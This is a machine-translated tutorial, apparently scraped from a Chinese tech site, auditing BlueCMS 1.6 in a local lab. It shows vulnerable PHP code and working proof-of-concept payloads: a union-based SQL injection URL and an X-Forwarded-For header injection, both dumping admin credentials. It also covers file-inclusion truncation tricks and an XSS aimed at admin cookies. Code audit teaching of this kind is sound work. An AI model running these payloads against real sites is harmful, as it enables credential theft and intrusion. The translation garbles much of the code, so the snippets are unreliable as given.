Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to use bluecms audit in php. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

Code audit

I. Audit methods

Audit methods:

Locate sensitive keywords, backtrack parameter transfer process

Locate sensitive function points and read through function codes (black box + white box)

System reinstallation

File upload

File management function

Login authentication

Password recovery

Order payment

Full-text code read-through audit (index.php tracking debugging)

Utility:

Seay code audit

Rips

Xdebug

II. Bluecms audit 2.0 audit environment

Phpstudy

Php5.2

Bluecms1.6 sp1 (forget about installation)

Seay Code Audit system

2.1 ad_js.php sql injection vulnerability

Seay automatic audit

Suspected sql injection vulnerability in ad_js.php

Require_once dirname (_ _ FILE__). '/ include/common.inc.php'

The configuration file for the website is included here, and there is a unified configuration in the configuration file

If (! get_magic_quotes_gpc ()) {$_ POST = deep_addslashes ($_ POST); $_ GET = deep_addslashes ($_ GET); $_ COOKIES = deep_addslashes ($_ COOKIES); $_ REQUEST = deep_addslashes ($_ REQUEST);}

Perform gpc processing on $* post, $* get, $* cookies and $* request, and transfer specific characters to the resulting parameters.

But ad_js.php doesn't use single quotation marks, so it can be bypassed.

View the getone () function without filtering:

Function getone ($sql,$ type=MYSQL_ASSOC) {$query = $this- > query ($sql,$this- > linkid); $row = mysql_fetch_array ($query, $type); return $row;}

There is indeed a digital injection.

Can be echoed according to the page

Successfully echo the position of 7.

Poc:

Http://www.blue.com/ad_js.php?ad_id=1 union select 1, 2, 3, 4, 5, 6, grouphammer concat (admin_name,0x7e,pwd) from blue_admin--+

2.2 comment.php sql injection vulnerability

Include/common.fun.php:

/ * get user IP * * / function getip () {if (getenv ('HTTP_CLIENT_IP')) {$ip = getenv (' HTTP_CLIENT_IP');} elseif (getenv ('HTTP_X_FORWARDED_FOR')) {/ / get the real ip address $ip = getenv (' HTTP_X_FORWARDED_FOR') when the client accesses it with a proxy server } elseif (getenv ('HTTP_X_FORWARDED')) {$ip = getenv (' HTTP_X_FORWARDED');} elseif (getenv ('HTTP_FORWARDED_FOR')) {$ip = getenv (' HTTP_FORWARDED_FOR');} elseif (getenv ('HTTP_FORWARDED')) {$ip = getenv (' HTTP_FORWARDED') } else {$ip = $_ SERVER ['REMOTE_ADDR'];} return $ip;}

Gpc processing of $* post, $* get, $* cookies and $* request is unified in the configuration file, but $_ SERVER is omitted. And the website precisely obtains the ip address through this variable, so we can forge the ip through client-ip or x-forwarded-for and so on.

The getip function is used in the shortcut "ctrl+shift+F in the item to search where" in phpstorm.

Call in comment.php

$sql = "INSERT INTO" .table ('comment'). (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) VALUES (','$id','$user_id','$type','$mood','$content','$timestamp','".getip ()','$is_check')"

Transfer $content to avoid xss

$content =! empty ($_ POST ['comment'])? Htmlspecialchars ($_ POST ['comment']):''

Perform gpc translation of other parameters and intval cast of characters.

But there is something wrong with this getip function, which is not filtered. So we can fake ip and cause sql injection.

The function of test comments is normal.

We can modify the source code to execute the executed sql statement, and then end the program.

You can see that the ip can be forged successfully.

Get the sql statement

INSERT INTO blue_comment (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) VALUES ("1", "1", "1", "1", "6", "123", "16135389", "1.1.1.1")

So we construct the sql statement at the fake ip comment.

Poc:

X-Forwarded-For: 1.1.1.1), (','1), (','1), (select group_concat (admin_name, ":", pwd) from blue_admin), '1613538242,' 1.1.1.1

Comment posted successfully

Successful injection

2.3 File contains vulnerabilities

User.php750 Lin

Elseif ($act = = 'pay') {include' data/pay.cache.php'; $price = $_ POST ['price']; $id = $_ POST [' id']; $name = $_ POST ['name']; if (empty ($_ POST [' pay']) {showmsg ('sorry, you don't have a payment method');} include 'include/payment/'.$_POST [' pay']. "/ index.php";}

After analyzing the code, we find that $_ POST ['pay'] does not do unnecessary security detection, but splices directly. As mentioned earlier, the post method is rewritten and will be translated, so truncation is not possible.

Let's talk about the conditions of each truncation here.

00 truncation (requires php version less than 5.3.8 and magic_quotes_gpc = Off) period truncation (windows only) (php version 5.2.17, Magic_quotes_gpc = On) index.php?file=phpinfo.php. . (the length of this test Degree needs to be greater than 269). / truncation (php version 5.2.17, Magic_quotes_gpc = On) index.php?file=phpinfo.php./. /. /. / (the length of this test needs to be greater than 269)

It should be the reason for the configuration of my local environment, which failed to reproduce successfully.

Later, you can upload the avatar and write shell in the file.

2.4 user registration xss vulnerability

Instead of Seay digging for xss vulnerabilities this time, we audited xss vulnerabilities through key functional tests. In the background-> member Management-> member list, the administrator can view the member information. If the information here can be inserted into the xss code from the foreground, the administrator cookie can be stolen.

Come to the front desk member registry, try to register a user, you can see that there are controllable user names, mailboxes, passwords are generally not considered.

Submit registration, grab the package for specific analysis, you can see that it is the do_reg method of user.php.

Elseif ($act = = 'do_reg') {$user_name =! empty ($_ POST [' user_name'])? Trim ($_ POST ['user_name']):'; $pwd =! empty ($_ POST ['pwd'])? Trim ($_ POST ['pwd']):'; $pwd1 =! empty ($_ POST ['pwd1'])? Trim ($_ POST ['pwd1']):'; $email =! empty ($_ POST ['email'])? Trim ($_ POST ['email']):'; $safecode =! empty ($_ POST ['safecode'])? Trim ($_ POST ['safecode']):'; $from =! empty ($from)? Base64_decode ($from): 'user.php'; if (strlen ($user_name))

< 4 || strlen($user_name) >

16) {showmsg ('username character length does not match');} if (strlen ($pwd)

< 6){ showmsg('密码不能少于6个字符'); } if($pwd != $pwd1){ showmsg('两次输入密码不一致'); } if(strtolower($safecode) != strtolower($_SESSION['safecode'])){ showmsg('验证码错误'); } if($db->

Getone ("SELECT * FROM" .table ('user'). " WHERE user_name='$user_name' ") {showmsg ('the user name already exists');} if ($db- > getone (" SELECT * FROM ".table ('admin')." WHERE admin_name='$user_name' ") {showmsg ('the user name already exists');} $sql =" INSERT INTO ".table ('user')." (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES (','$user_name', md5 ('$pwd'),'$email','$timestamp','$timestamp') "; if (! $db- > query ($sql)) {showmsg ('Sorry, error in registration');} else {$SESSION ['user_id'] = $db- > insert_id () $_ SESSION ['user_name'] = $user_name; update_user_info ($_ SESSION [' user_name']); setcookie ('blue [user _ id]', $_ SESSION ['user_id'], time () + 3600, $cookiepath, $cookiedomain); setcookie (' blue [user _ name]', $user_name, time () + 3600, $cookiepath, $cookiedomain) Setcookie ('blue [user _ pwd]', md5 (md5 ($pwd). $_ CFG ['cookie_hash']), time () + 3600, $cookiepath, $cookiedomain); if (defined (' UC_API') & & @ include_once (BLUE_ROOT.'uc_client/client.php')) {$uid = uc_user_register ($user_name, $pwd, $email) If ($uid

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.